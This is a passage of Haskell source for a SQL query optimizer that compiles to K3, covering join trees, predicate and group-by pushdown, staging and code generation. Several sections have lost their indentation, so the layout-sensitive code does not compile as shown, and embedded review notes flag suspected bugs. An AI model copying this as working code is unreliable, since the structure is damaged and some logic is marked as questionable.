localizeInputExprs sid lsid rsid exprs = do
  [lfr, rfr] <- mapM sqclkupM [lsid, rsid]
  let (lroots, rroots) = (nub $ attrEnvPtrs lfr, nub $ attrEnvPtrs rfr)
  foldM (localize lroots rroots $ nub $ concat [lroots, rroots]) ([], [], []) exprs
  where
    localize lroots rroots roots (lacc, racc, acc) e = do
      eptrs <- exprAttrs sid e
      reptrs <- rebaseAttrsToRoots roots eptrs
      return $
        if reptrs `intersect` lroots == reptrs then (lacc++[e], racc, acc)
        else if reptrs `intersect` rroots == reptrs then (lacc, racc++[e], acc)
        else (lacc, racc, acc++[e])
{- Optimization -}
-- TODO: query decorrelation
-- | Translates SQL statements into SQL declarations, registering table
--   schemas and constructing query plans for query statements. The helpers
--   in the where clause below implement plan construction, predicate
--   pushdown and group-by pushdown.
sqloptimize :: [Statement] -> SQLParseM [SQLDecl]
sqloptimize l = mapM stmt l
  where
    -- Table definitions register their schema; queries are planned.
    stmt (CreateTable _ nm attrs _) = do
      t <- sqltabletype attrs
      sqrextM (sqlnm nm) t
      return $ SQLRel (sqlnm nm, t)
    stmt (QueryStatement _ q) = do
      qcl <- query q
      return $ SQLQuery $ qcplan qcl
    stmt s = throwE $ "Unimplemented SQL stmt: " ++ show s
    -- TODO: distinct, order, limit, offset
    -- Dispatches a supported select query to plan construction; all other
    -- query forms are rejected.
    query (Select _ _ selectL tableL whereE gbL havingE _ _ _) = queryPlan selectL tableL whereE gbL havingE
    query q = throwE $ "Unhandled query " ++ show q
    -- TODO: simplify chains with join tree before adding to top-level plan.
    -- Builds a query closure for a select query: join tree construction,
    -- predicate pushdown, aggregate/group-by placement, and free-variable /
    -- subquery collection.
    queryPlan selectL tableL whereE gbL havingE = do
      tfvOpt <- joinTree tableL
      case tfvOpt of
        -- No FROM clause: a pure expression plan with no join tree.
        Nothing -> do
          (prjs, aggs, gsid) <- aggregatePath Nothing selectL
          (efvs, subqs) <- varsAndQueries Nothing $ projectionexprs $ prjs ++ aggs
          return $ QueryClosure efvs $ QueryPlan Nothing [PlanCPath gsid [] [] prjs aggs Nothing subqs] Nothing
        Just (t, fvs) -> do
          sid <- treeSchema t
          conjuncts <- maybe (return []) splitConjuncts whereE
          (nt, remconjuncts) <- predicatePushdown (Just sid) conjuncts t
          (prjs, aggs, gsid) <- aggregatePath (Just sid) selectL
          -- Nothing left after pushdown: the tree alone is the plan.
          if all null [remconjuncts, gbL, projectionexprs prjs, projectionexprs aggs]
            then return $ QueryClosure fvs $ QueryPlan (Just nt) [] Nothing
            else do
              (gnt, naggs) <- if null gbL then return (nt, aggs) else groupByPushdown nt sid (map mkprojection gbL) aggs
              (efvs, subqs) <- debugGBPushdown gnt
                                 $ varsAndQueries (Just sid) $ remconjuncts ++ gbL ++ (projectionexprs $ prjs ++ naggs)
              (hfvs, hsubqs) <- maybe (return ([], [])) (\e -> varsAndQueries (Just gsid) [e]) havingE
              let chains = [PlanCPath gsid remconjuncts gbL prjs naggs havingE $ subqs ++ hsubqs]
              return $ QueryClosure (nub $ fvs ++ efvs ++ hfvs) $ QueryPlan (Just gnt) chains Nothing
    -- Traces the group-by pushdown result; the False guard means tracing is
    -- currently always on.
    debugGBPushdown x y = if False then y else trace (boxToString $ ["GB pushdown result"] %$ prettyLines x) y
    -- Folds the FROM-clause items into a left-deep tree of cross-product
    -- joins, accumulating free variables discovered in subqueries.
    joinTree [] = return Nothing
    joinTree (h:t) = do
      n <- unaryNode h
      (tree, tfvs) <- foldM binaryNode n t
      return $ Just (tree, tfvs)
    -- Combines an accumulated tree with the next FROM item as an
    -- unconditioned (cross-product) join.
    binaryNode (lhs, lfvs) n = do
      (rhs, rfvs) <- unaryNode n
      (lsid, rsid) <- (,) <$> treeSchema lhs <*> treeSchema rhs
      jpsid <- mergeScopes lsid rsid
      josid <- aliasedOutputScope jpsid "__CP" Nothing
      return (Node (PJoin jpsid josid Nothing [] [] [] []) [lhs, rhs], nub $ lfvs ++ rfvs)
    -- Builds a plan node for a single FROM-clause item: a base-table leaf,
    -- a planned subquery leaf, or an explicit-join subtree.
    unaryNode n@(Tref _ nm al) = do
      let tid = sqltablealias ("__" ++ sqlnm nm) al
      t <- sqrlkupM $ sqlnm nm
      rt <- taliascolM al t
      tsid <- sqgextSchemaM tid rt
      return (Node (PTable (sqlnm nm) tsid (Just n) Nothing []) [], [])
    unaryNode (SubTref _ q al) = do
      qcl <- query q
      nqsid <- planSchema $ qcplan qcl
      qalsid <- outputScope nqsid "__RN" (Just al)
      return (Node (PSubquery qalsid qcl) [], qcfree qcl)
    unaryNode (JoinTref _ jlt nat jointy jrt onE jal) = do
      (lhs, lfvs) <- unaryNode jlt
      (rhs, rfvs) <- unaryNode jrt
      (lsid, rsid) <- (,) <$> treeSchema lhs <*> treeSchema rhs
      jpsid <- mergeScopes lsid rsid
      (jeq, jp, pfvs, psq) <- joinPredicate jpsid lsid rsid onE
      josid <- aliasedOutputScope jpsid "__JR" (Just jal)
      return (Node (PJoin jpsid josid (Just (nat,jointy)) jeq jp psq []) [lhs, rhs], nub $ lfvs ++ rfvs ++ pfvs)
    unaryNode (FunTref _ _ _) = throwE "Table-valued functions are not supported"
    -- Extracts equality and residual join predicates from an ON/USING
    -- clause, together with the free variables and subquery bindings they
    -- reference. No clause yields empty results.
    joinPredicate :: ScopeId -> ScopeId -> ScopeId -> OnExpr -> SQLParseM ([(ScalarExpr, ScalarExpr)], ScalarExprList, [AttrPath], SubqueryBindings)
    joinPredicate sid lsid rsid (Just (JoinOn _ joinE)) = do
      conjuncts <- splitConjuncts joinE
      (sepcons, nsepcons) <- classifyConjuncts sid lsid rsid conjuncts >>= return . partitionEithers
      let (lseps, rseps) = unzip sepcons
      (lcvs, lsubqs) <- varsAndQueries (Just sid) lseps
      (rcvs, rsubqs) <- varsAndQueries (Just sid) rseps
      (cvs, subqs) <- varsAndQueries (Just sid) nsepcons
      return (sepcons, nsepcons, nub $ lcvs ++ rcvs ++ cvs, nub $ lsubqs ++ rsubqs ++ subqs)
    -- USING (c1, ..): equate identically-named columns from each side's
    -- qualifier. Requires exactly one qualifier per input.
    joinPredicate sid _ _ (Just (JoinUsing _ nmcs)) = do
      (_, _, [[lqual], [rqual]]) <- sqclkupM sid
      let eqs = map (\i -> (QIdentifier emptyAnnotation [Nmc lqual, i], QIdentifier emptyAnnotation [Nmc rqual, i])) nmcs
      return (eqs, [], [], [])
    joinPredicate _ _ _ _ = return ([], [], [], [])
splitConjuncts :: ScalarExpr -> SQLParseM ScalarExprList
splitConjuncts e@(FunCall _ nm args) = do
let fn = sqlnm nm
case (fn, args) of
("!and", [x,y]) -> (++) <$> splitConjuncts x <*> splitConjuncts y
_ -> return [e]
splitConjuncts e = return [e]
classifyConjuncts :: ScopeId -> ScopeId -> ScopeId -> ScalarExprList -> SQLParseM [Either (ScalarExpr, ScalarExpr) ScalarExpr]
classifyConjuncts sid lsid rsid es = do
(lrels, rrels) <- (,) <$> baseRelationsS lsid <*> baseRelationsS rsid
mapM (classifyConjunct sid lsid rsid lrels rrels) es
    -- Classifies a conjunct as a separable equi-join pair (Left, oriented
    -- as (left-side expr, right-side expr)) when it is an equality whose
    -- operands each touch only one input's base relations; otherwise Right
    -- (a residual predicate).
    classifyConjunct :: ScopeId -> ScopeId -> ScopeId -> [Identifier] -> [Identifier] -> ScalarExpr
                     -> SQLParseM (Either (ScalarExpr, ScalarExpr) ScalarExpr)
    classifyConjunct sid lsid rsid lrels rrels e@(FunCall _ nm args) = do
      let fn = sqlnm nm
      case sqloperator fn args of
        (Just (BinaryOp OEqu x y)) -> do
          (xrels, yrels) <- (,) <$> baseRelationsE sid x <*> baseRelationsE sid y
          classify x y xrels yrels
        _ -> return $ Right e
      where
        classify x y (nub -> xrels) (nub -> yrels)
          | xrels `intersect` lrels == xrels && yrels `intersect` rrels == yrels = do
            -- NOTE(review): the rebased results nx/ny are discarded and the
            -- original operands are returned; the rebase appears to serve
            -- only as a monadic validity check here -- confirm intended.
            [nx] <- rebaseExprs sid [lsid] [x]
            [ny] <- rebaseExprs sid [rsid] [y]
            return $ Left (x,y)
          | xrels `intersect` rrels == xrels && yrels `intersect` lrels == yrels = do
            [ny] <- rebaseExprs sid [lsid] [y]
            [nx] <- rebaseExprs sid [rsid] [x]
            return $ Left (y,x)
          | otherwise = return $ Right e
    classifyConjunct _ _ _ _ _ e = return $ Right e
aggregatePath :: Maybe ScopeId -> SelectList -> SQLParseM (SelectItemList, SelectItemList, ScopeId)
aggregatePath sidOpt (SelectList _ selectL) = do
(prjs, aggs) <- mapM classifySelectItem selectL >>= return . partitionEithers
asid <- aggregateSchema sidOpt prjs aggs
return (prjs, aggs, asid)
classifySelectItem :: SelectItem -> SQLParseM (Either SelectItem SelectItem)
classifySelectItem si@(SelExp _ e) = isAggregate e >>= \agg -> return $ if agg then Right si else Left si
classifySelectItem si@(SelectItem _ e _) = isAggregate e >>= \agg -> return $ if agg then Right si else Left si
    -- TODO: AggregateFn, Interval, LiftOperator, WindowFn
    -- Collects the free attribute paths (those not resolvable in the given
    -- scope) and subquery bindings appearing in a list of expressions.
    varsAndQueries :: Maybe ScopeId -> ScalarExprList -> SQLParseM ([AttrPath], SubqueryBindings)
    varsAndQueries sidOpt exprs = processMany exprs
      where process (FunCall _ _ args) = processMany args
            -- An identifier is free exactly when the scope lookup fails.
            process (Identifier _ (sqlnmcomponent -> i)) = trypath sidOpt (return ([[i]], [])) (const $ return ([], [])) [i]
            process (QIdentifier _ (sqlnmpath -> path)) = trypath sidOpt (return ([path], [])) (const $ return ([], [])) path
            process (Case _ whens elseexpr) = caseList (maybe [] (:[]) elseexpr) whens
            process (CaseSimple _ expr whens elseexpr) = caseList ([expr] ++ maybe [] (:[]) elseexpr) whens
            process e@(Exists _ q) = bindSubquery e q
            process e@(ScalarSubQuery _ q) = bindSubquery e q
            process (InPredicate _ ine _ (InList _ el)) = processMany $ ine : el
            process e@(InPredicate _ ine _ (InQueryExpr _ q)) = do
              (invs, inbs) <- process ine
              (qvs, qbs) <- bindSubquery e q
              return (invs ++ qvs, inbs ++ qbs)
            process (Cast _ e _) = process e
            process (Extract _ _ e) = process e
            process _ = return ([], [])
            -- NOTE(review): concatR appears to be unused.
            concatR (a,b) (c,d) = (nub $ a++c, b++d)
            concatMany l = return $ (nub . concat) *** concat $ unzip l
            processMany el = mapM process el >>= concatMany
            -- Plans the subquery and records it under a fresh name, keeping
            -- only those of its free variables that are also free here.
            bindSubquery e q = do
              sym <- ssqsextM
              qcl <- query q
              vbl <- mapM (\path -> trypath sidOpt (return ([path], [])) (const $ return ([], [])) path) $ qcfree qcl
              return (concat $ map fst vbl, [(e, ("__subquery" ++ show sym, qcl))])
            caseList extra whens = do
              rl <- (\a b -> a ++ [b]) <$> mapM (\(l,e) -> processMany $ l++[e]) whens <*> processMany extra
              concatMany rl
    -- Pushes WHERE-clause conjuncts down to the lowest join or table node
    -- covering their base relations, returning the rewritten tree and the
    -- conjuncts that could not be placed.
    predicatePushdown :: Maybe ScopeId -> ScalarExprList -> PlanTree -> SQLParseM (PlanTree, ScalarExprList)
    predicatePushdown Nothing preds jtree = return (jtree, preds)
    predicatePushdown (Just sid) preds jtree = foldM push (jtree, []) preds
      where
        push (t, remdr) p = do
          rels <- baseRelationsE sid p
          (nt, accs) <- onRelLCA t rels $ inject p
          -- A True flag from inject means the predicate was not placed and
          -- must remain at the top level.
          return (nt, if any id accs then remdr ++ [p] else remdr)
        -- Tables absorb the predicate as a selection on their chain.
        inject p _ n@(ttag -> PTable tid tsid trOpt bmOpt chains) = do
          [np] <- rebaseExprs sid [tsid] [p]
          (_, npqbs) <- varsAndQueries (Just tsid) [np]
          return (replaceData n $ PTable tid tsid trOpt bmOpt $ pcextSelect sid npqbs np chains, False)
        -- Joins absorb equality conjuncts as equi-join pairs and others as
        -- residual join predicates.
        inject p [lrels, rrels] n@(Node (PJoin psid osid jt jeq jp jpb chains) [l,r]) = do
          (lsid, rsid) <- (,) <$> treeSchema l <*> treeSchema r
          [np] <- rebaseExprs sid [psid] [p]
          sepE <- classifyConjunct sid lsid rsid lrels rrels np
          (njeq, njp, nsubqbs) <- case sepE of
            Left (lsep,rsep) -> do
              (_, lqbs) <- varsAndQueries (Just lsid) [lsep]
              (_, rqbs) <- varsAndQueries (Just rsid) [rsep]
              return (jeq ++ [(lsep,rsep)], jp, lqbs ++ rqbs)
            Right nonsep -> do
              (_, rqbs) <- varsAndQueries (Just psid) [nonsep]
              return (jeq, jp ++ [nonsep], rqbs)
          return (replaceData n $ PJoin psid osid jt njeq njp (jpb ++ nsubqbs) chains, False)
        inject _ _ n = return (n, True)
    -- Applies a function at the lowest common ancestor node covering the
    -- given set of base relations, rebuilding the tree bottom-up. The fold
    -- accumulator tracks (handled?, relations seen per child, rebuilt
    -- nodes, collected results).
    onRelLCA :: PlanTree -> [Identifier] -> ([[Identifier]] -> PlanTree -> SQLParseM (PlanTree, a)) -> SQLParseM (PlanTree, [a])
    onRelLCA t rels f = do
      (_,_,x,y) <- foldMapTree go (False, [], [], []) t
      return (head x, y)
      where
        -- Already handled in a subtree: just rebuild this node.
        go (conc -> (True, _, nch, acc)) n = return (True, [], [replaceCh n nch], acc)
        -- Table leaf: its own relation name counts toward coverage.
        go (conc -> (False, relsByCh@(concat -> chrels), nch, acc)) n@(ttag -> PTable (("__" ++) -> i) _ _ _ _)
          | rels `intersect` (chrels ++ [i]) == rels = f relsByCh (replaceCh n nch) >>= \(n',r) -> return (True, [], [n'], acc++[r])
          | otherwise = return (False, chrels++[i], [replaceCh n nch], acc)
        go (conc -> (False, relsByCh@(concat -> chrels), nch, acc)) n
          | rels `intersect` chrels == rels = f relsByCh (replaceCh n nch) >>= \(n', r) -> return (True, [], [n'], acc++[r])
          | otherwise = return (False, chrels, [replaceCh n nch], acc)
        go _ _ = throwE "onRelLCA pattern mismatch"
        conc cl = (\(a,b,c,d) -> (any id a, b, concat c, concat d)) $ unzip4 cl
    -- Pushes group-by/aggregate computation below equi-joins wherever the
    -- grouping and aggregate attributes decompose cleanly onto the join's
    -- inputs, returning the rewritten tree and the replacement (combiner)
    -- aggregates to apply at the top.
    groupByPushdown :: PlanTree -> ScopeId -> SelectItemList -> SelectItemList -> SQLParseM (PlanTree, SelectItemList)
    groupByPushdown jtree s g a = walk s g a jtree
      where
        walk sid gbs aggs e@(Node n ch) = do
          let onRoot = n == ttag jtree
          continue <- trace (boxToString $ ["GB walk"] %$ prettyLines e) $ trypush sid gbs aggs ch n
          case continue of
            Left doExtend -> complete onRoot doExtend aggs sid gbs aggs $ Node n ch
            Right (doExtend, naggs, chsga) -> do
              nch <- mapM (\((cs,cg,ca), c) -> walk cs cg ca c >>= return . fst) $ zip chsga ch
              complete onRoot doExtend naggs sid gbs naggs $ Node n nch
        -- Decides whether pushing below an equi-join is possible: the
        -- group-bys and aggregates must localize entirely onto the inputs,
        -- and the join's chains must carry no aggregates of their own.
        trypush sid gbs aggs [lt,rt] n@(PJoin psid osid _ jeq jp _ chains)
          | not $ null jeq = do
            jptrs <- joinAttrs psid osid jeq jp chains
            aptrs <- aggAttrs psid sid aggs
            let caggs = chainAggregates osid chains
            let overlaps = jptrs `intersect` aptrs
            case (caggs, overlaps) of
              ([],[]) -> do
                (lsid, rsid) <- (,) <$> treeSchema lt <*> treeSchema rt
                (lgbs, rgbs, remgbs) <- localizeJoin lsid rsid psid sid gbs jptrs
                (laggs, raggs, remaggs, naggs) <- decomposeAggregates lsid rsid psid sid aggs
                if debugAggDecomp psid osid lgbs rgbs remgbs laggs raggs remaggs naggs $ not (null remgbs && null remaggs)
                  then return $ Left True
                  else return $ Right (True, naggs, [(lsid, lgbs, laggs), (rsid, rgbs, raggs)])
              (_,_) -> return $ Left $ null caggs
          | otherwise = return $ Left $ null $ chainAggregates osid chains
        trypush _ _ _ _ (PJoin _ _ _ _ _ _ _) = throwE "Invalid binary join node"
        trypush _ _ _ ch n@(PTable _ tsid _ _ chains) = return $ Left $ null $ chainAggregates tsid chains
        trypush _ _ _ ch n@(PSubquery _ _) = return $ Left True
        -- NOTE(review): the call site above passes remaggs before naggs,
        -- while this definition binds naggs before remaggs -- the traced
        -- "Aggs" counts may be swapped; confirm the intended order.
        debugAggDecomp psid osid lgbs rgbs remgbs laggs raggs naggs remaggs m =
          trace (unwords ["Agg decomp", show psid, show osid
                         , "GBs:", show $ length lgbs, show $ length rgbs, show $ length remgbs
                         , "Aggs:", show $ length laggs, show $ length raggs, show $ length naggs, show $ length remaggs]) m
        -- Refreshes the node's schema and, off the root, appends the pushed
        -- group-by path. Only the root returns replacement aggregates.
        complete onRoot doExtend raggs sid gbs aggs (Node n ch) = do
          n' <- refreshInputSchema n ch
          n'' <- if not onRoot && doExtend then pcextGroupBy gbs aggs n' else return n'
          trace (boxToString $ ["Completed"] %$ prettyLines (Node n'' ch)) $
            return (Node n'' ch, if onRoot then raggs else [])
        chainAggregates sid chains = concatMap snd $ pcAggExprs sid chains
        -- Attribute pointers used by the join's predicates and its chains'
        -- non-aggregate expressions, rebased to the join's input scope.
        joinAttrs dsid sid1 eqexprs neqexprs chains = do
          eqptrs <- mapM (\(x,y) -> (++) <$> exprAttrs dsid x <*> exprAttrs dsid y) eqexprs >>= return . concat
          neqptrs <- mapM (exprAttrs dsid) neqexprs >>= return . concat
          let sidAndExprs = pcNonAggExprs sid1 chains
          exprptrs <- concatMapM (\(ssid,el) -> concatMapM (exprAttrs ssid) el) sidAndExprs
          rexprptrs <- rebaseAttrs dsid exprptrs
          return $ nub $ eqptrs ++ neqptrs ++ rexprptrs
        aggAttrs dsid ssid aggs = do
          aggptrs <- concatMapM (exprAttrs ssid) $ projectionexprs aggs
          rebaseAttrs dsid $ nub aggptrs
        -- Splits group-by expressions (plus join attributes) onto the
        -- join's left and right inputs.
        localizeJoin lsid rsid psid sid gbs jptrs = do
          gbptrs <- concatMapM (exprAttrs sid) $ projectionexprs gbs
          rgbptrs <- rebaseAttrs psid gbptrs
          localizeAttrs lsid rsid psid $ rgbptrs ++ jptrs
        localizeAttrs lsid rsid psid ptrs = do
          nodes <- mapM sqglkupM $ nub $ ptrs
          (lexprs, rexprs, rest) <- localizeInputExprs psid lsid rsid $ map (\n -> Identifier emptyAnnotation $ Nmc $ adnn n) nodes
          return (map mkprojection lexprs, map mkprojection rexprs, rest)
        -- Rewrites each aggregate into per-side partial aggregates plus a
        -- top-level combiner, failing over to the residual list when an
        -- aggregate spans both inputs.
        decomposeAggregates lsid rsid psid sid aggs = do
          (aggexprs, aggFns) <- aggregateexprs aggs
          raggptrs <- mapM (\e -> exprAttrs sid e >>= rebaseAttrs psid) aggexprs
          ragglocals <- mapM (localizeAttrs lsid rsid psid) raggptrs
          foldM (decomposeAggByFn lsid rsid sid) ([], [], [], []) $ zip3 ragglocals (zip aggs aggexprs) aggFns
        decomposeAggByFn lsid rsid sid (lacc, racc, acc, nacc) ((ldeps, rdeps, deps), (agg,e), fn) =
          if null deps then do
            (eagg, cagg, nagg) <- rewriteAgg sid (if null rdeps then lsid else rsid) fn agg e
            let (nlacc, nracc) = if null rdeps then (lacc ++ [eagg], racc ++ [cagg]) else (lacc ++ [cagg], racc ++ [eagg])
            return (nlacc, nracc, acc, nacc ++ [nagg])
          else return (lacc, racc, acc ++ [e], nacc)
        -- Builds (per-side partial aggregate, partner-side count, final
        -- combiner) with fresh "__AGGD<n>" column names.
        rewriteAgg ssid dsid aggFn agg e = do
          ne <- rebaseExprs ssid [dsid] [e] >>= return . head
          (ei, ci) <- (\a b -> ("__AGGD" ++ show a, "__AGGD" ++ show b)) <$> saggsextM <*> saggsextM
          (,,) <$> mkaggregate aggFn (SelectItem emptyAnnotation e $ Nmc ei) ne
               <*> mkaggregate AggCount (SelectItem emptyAnnotation e $ Nmc ci) (Star emptyAnnotation)
               <*> mkaggregate aggFn agg (FunCall emptyAnnotation (Name emptyAnnotation [Nmc "*"])
                                          [Identifier emptyAnnotation $ Nmc ei
                                          ,Identifier emptyAnnotation $ Nmc ci])
        concatMapM f x = mapM f x >>= return . concat
-- | Split query plans into materialized stages. Each non-trivial plan step
--   (join, aggregate path) is cut into its own SQLStage/SQLQuery pair, and a
--   stage graph (leaves and producer->consumer edges) is accumulated alongside.
sqlstage :: [SQLDecl] -> SQLParseM ([SQLDecl], StageGraph)
sqlstage stmts = mapM stage stmts >>= return . (concat *** concat) . unzip
where
-- Relations pass through unchanged; pre-existing stages are rejected since
-- staging is expected to run exactly once.
stage s@(SQLRel _) = return ([s], [])
stage s@(SQLStage _) = throwE "SQLStage called with existing stage declarations"
stage (SQLQuery plan) = stagePlan plan >>= \(_,l,g) -> return (l,g)
-- Stage the join tree first (if any), then the plan's chain components.
stagePlan (QueryPlan tOpt chains stgOpt) = do
(ntOpt, (tstages, tstgg)) <- maybe (return (Nothing, ([], []))) (\t -> stageTree t >>= return . first Just) tOpt
(nplan, cstages, nstgg) <- stagePlanChains tstgg ntOpt stgOpt chains
return (nplan, tstages ++ cstages, nstgg)
stageTree jtree = (\((a,b),c) -> (c,(a,b))) <$> foldMapRebuildTree stageNode ([],[]) jtree
-- A join becomes its own stage: the join (plus its non-aggregate chain prefix)
-- is emitted as a staged query, and the node is replaced by a table reading
-- the stage's materialization.
stageNode (aconcat -> (acc, [lstgg,rstgg])) ch n@(ttag -> PJoin psid osid jt jeq jp jpb chains) = do
stgid <- stgsextM >>= return . stageId . show
let (jchains, schains) = nonAggregatePrefix chains
let jtOpt = Just $ Node (PJoin psid osid jt jeq jp jpb jchains) ch
let jstage = SQLQuery $ QueryPlan jtOpt [] (Just stgid)
let nt = Node (PTable stgid osid Nothing Nothing []) []
let jstgg = stgEdges [lstgg, rstgg] stgid
(st, nstages, nstgg) <- stageNodeChains jstgg nt schains
let nstgg' = lstgg ++ rstgg ++ nstgg
kt <- k3ScopeType osid bmelem
return ((acc ++ [SQLStage (stgid, kt), jstage] ++ nstages, nstgg'), st)
-- Tables keep their non-aggregate chain prefix inline; the remainder is staged.
stageNode (aconcat -> (acc, stgg)) ch n@(ttag -> PTable i tsid trOpt bmOpt chains) = do
let (tchains, schains) = nonAggregatePrefix chains
let nt = Node (PTable i tsid trOpt bmOpt tchains) ch
(st, nstages, nstgg) <- stageNodeChains [Left i] nt schains
return ((acc ++ nstages, concat stgg ++ nstgg), st)
stageNode (aconcat -> (acc, stgg)) ch n@(ttag -> PSubquery osid (QueryClosure fvs plan)) = do
(nplan, nstages, nstgg) <- stagePlan plan
return ((acc ++ nstages, concat stgg ++ nstgg), Node (PSubquery osid $ QueryClosure fvs nplan) ch)
stageNode _ _ n = throwE $ boxToString $ ["Invalid tree node for staging"] %$ prettyLines n
stagePlanChains stgg Nothing stgOpt chains = return (QueryPlan Nothing chains stgOpt, [], stgg)
stagePlanChains stgg (Just t) stgOpt chains = do
let (pchains, schains) = nonAggregatePrefix chains
nt <- foldM (flip pcext) t pchains
(st, nstages, nstgg) <- stageNodeChains stgg nt schains
return (QueryPlan (Just st) [] stgOpt, nstages, nstgg)
-- Fold each remaining chain component onto the tree; non-aggregate paths are
-- absorbed in place, aggregate paths force a new stage cut.
stageNodeChains stgg t chains = foldM onPath (t,[],stgg) chains
where onPath (t, acc, stggacc) p = do
pt <- pcext p t
if isNonAggregatePath p
then return (pt, acc, stggacc)
else do
stgid <- stgsextM >>= return . stageId . show
let pstage = SQLQuery $ QueryPlan (Just pt) [] (Just stgid)
osid <- treeSchema pt
bm <- treeBindingMap pt
kt <- k3ScopeType osid bm
-- Aggregate stages materialize the flattened record type of the result.
rkt <- if not $ isAggregatePath p
then return kt
else do
et <- telemM kt
case tnc et of
(TRecord ids, ch) -> zeroT $ zip ids ch
_ -> throwE "Invalid k3 aggregate plan type"
let nt = Node (PTable stgid osid Nothing (Just bm) []) []
let nstgg = stggacc ++ stgEdges [stggacc] stgid
return (nt, acc ++ [SQLStage (stgid, rkt), pstage], nstgg)
-- Edges from the last element of each child stage list into the new stage.
stgEdges ll i = map (Right . (,i)) $ catMaybes $ stgCh ll
stgCh ll = map (\l -> if null l then Nothing else Just $ either id snd $ last l) ll
-- Longest prefix of chain components that contain no aggregates.
nonAggregatePrefix chains = fst $ foldl accum (([],[]), False) chains
where accum ((nagg,agg), found) p | not found && isNonAggregatePath p = ((nagg ++ [p], agg), False)
| otherwise = ((nagg, agg++[p]), True)
aconcat = (concat *** id) . unzip
-- | Generate K3 declarations from staged SQL declarations and their stage graph.
--   The Bool selects distributed code generation (distributed join/group-by
--   annotations, master-driven stage initiation) versus single-node execution.
sqlcodegen :: Bool -> ([SQLDecl], StageGraph) -> SQLParseM (K3 Declaration)
sqlcodegen distributed (stmts, stgg) = do
(decls, inits) <- foldM cgstmt ([], []) stmts
initDecl <- mkInit decls
return $ DC.role "__global" $ [master] ++ decls ++ mkPeerInit inits ++ initDecl
where
-- Naming convention for a stage's trigger.
trig i = i ++ "_trigger"
-- Stage graph: leaves are source stages; edges are (producer, consumer) pairs.
(leaves, edges) = partitionEithers stgg
stagechildren = foldl (\acc (s,t) -> Map.insertWith (++) t [s] acc) Map.empty edges
-- Stages all of whose inputs are leaves; started first in distributed mode.
stageinits = Map.foldlWithKey (\acc p ch -> if ch `intersect` leaves == ch then acc ++ [p] else acc) [] stagechildren
-- Per-declaration codegen, accumulating global declarations and peer-init expressions.
cgstmt (dacc, iacc) (SQLRel (i, t)) = do
gt <- twrapcolelemM t
(ldecls, linit) <- mkLoader (i,t)
return (dacc ++ [DC.global i gt Nothing] ++ ldecls, iacc ++ [linit])
cgstmt (dacc, iacc) (SQLStage (i, t)) = return (dacc ++ [DC.global i (mutT t) Nothing], iacc)
-- Queries become triggers assigning into their stage (or a fresh materialization)
-- and then firing the next stage's trigger, if any.
cgstmt (dacc, iacc) (SQLQuery plan) = do
(e,sid,bm,merge) <- cgplan plan
t <- k3PlanType bm plan
(outid, trigid, decls) <- case qstageid plan of
Just i -> return (i, trig i, [])
Nothing -> do
s <- stgsextM >>= return . show
let i = materializeId s
return (i, stageId s, [DC.global i (mutT t) Nothing])
let execStageF i e = case lookup i edges of
Nothing -> return e
Just next ->
let nextE = EC.send (EC.variable $ trig next) (EC.variable "me") EC.unit
execE = EC.block [e, nextE]
in annotateTriggerBody i plan merge execE
trigBodyE <- execStageF outid $ EC.assign outid e
return (dacc ++ decls ++ [ DC.trigger trigid TC.unit $ EC.lambda "_" trigBodyE ], iacc)
cgclosure (QueryClosure free plan)
| null free = cgplan plan
| otherwise = throwE "Code generation not supported for correlated queries"
-- Plan codegen: yields (expression, output scope, binding map, optional merge fn).
cgplan (QueryPlan tOpt chains _) = do
esbmOpt <- maybe (return Nothing) (\t -> cgtree t >>= return . Just) tOpt
cgchains esbmOpt chains
-- Join tree codegen: equijoins build key extractor lambdas; general joins
-- build a match predicate over the combined scope.
cgtree n@(Node (PJoin psid osid jtOpt jeq jp jsubqbs chains) [l,r]) = do
sf@(_,_,[[lqual],[rqual]]) <- sqclkupM psid
cqaenv <- partitionCommonQualifedAttrEnv sf
(lexpr, lsid, lbm, _) <- cgtree l
(rexpr, rsid, rbm, _) <- cgtree r
(li, ri) <- (,) <$> uniqueScopeQualifier lsid <*> uniqueScopeQualifier rsid
jbm <- bindingMap [(lqual, Map.lookup [lqual] cqaenv, lbm), (rqual, Map.lookup [rqual] cqaenv, rbm)]
case (jeq, jp) of
((_:_), []) -> do
let (lexprs, rexprs) = unzip jeq
lkbodyE <- mapM (cgexpr jsubqbs Nothing lsid) lexprs >>= \es -> bindE lsid lbm (Just li) $ tupE es
rkbodyE <- mapM (cgexpr jsubqbs Nothing rsid) rexprs >>= \es -> bindE rsid rbm (Just ri) $ tupE es
obodyE <- concatE psid jbm Nothing
let lkeyE = EC.lambda lqual lkbodyE
let rkeyE = EC.lambda rqual rkbodyE
let outE = EC.lambda lqual $ EC.lambda rqual obodyE
joinKV <- isKVBindingMap rbm
let joinE = EC.applyMany (EC.project (if joinKV then "equijoin_kv" else "equijoin") lexpr) [rexpr, lkeyE, rkeyE, outE]
cgchains (Just (joinE, osid, bmelem, Nothing)) chains
(_, _) -> do
mbodyE <- case jp of
[] -> bindE psid jbm Nothing $ EC.constant $ CBool True
(h:t) -> cgexpr jsubqbs Nothing psid h >>= \he -> foldM (cgconjunct jsubqbs psid) he t >>= \e -> bindE psid jbm Nothing e
obodyE <- concatE psid jbm Nothing
-- NOTE: this local matchE shadows the top-level matchE helper.
let matchE = EC.lambda lqual $ EC.lambda rqual mbodyE
let outE = EC.lambda lqual $ EC.lambda rqual obodyE
joinKV <- isKVBindingMap rbm
let joinE = EC.applyMany (EC.project (if joinKV then "join_kv" else "join") lexpr) [rexpr, matchE, outE]
cgchains (Just (joinE, osid, bmelem, Nothing)) chains
cgtree (Node (PSubquery _ qcl) ch) = cgclosure qcl
cgtree n@(Node (PTable i tsid _ bmOpt chains) []) = cgchains (Just (EC.variable i, tsid, maybe bmelem id bmOpt, Nothing)) chains
cgtree _ = throwE "Invalid plan tree"
-- Fold chain components over the tree's expression; a plan must produce a result.
cgchains esbmOpt chains = do
resbmOpt <- foldM cgchain esbmOpt chains
maybe (throwE "Invalid chain result") return resbmOpt
cgchain (Just (e,sid,bm,_)) (PlanCPath osid selects gbs prjs aggs having subqbs) = do
fe <- case selects of
[] -> return e
l -> foldM (filterChainE sid bm subqbs) e l
case (gbs, prjs, aggs, having) of
([], [], [], Nothing) -> return $ Just (fe, osid, bm, Nothing)
([], _, _, Nothing) -> cgselectlist sid osid bm subqbs fe prjs aggs
(h:t, _, _, _) -> cggroupby sid osid bm subqbs fe gbs prjs aggs having
_ -> throwE $ "Invalid group-by and having expression pair"
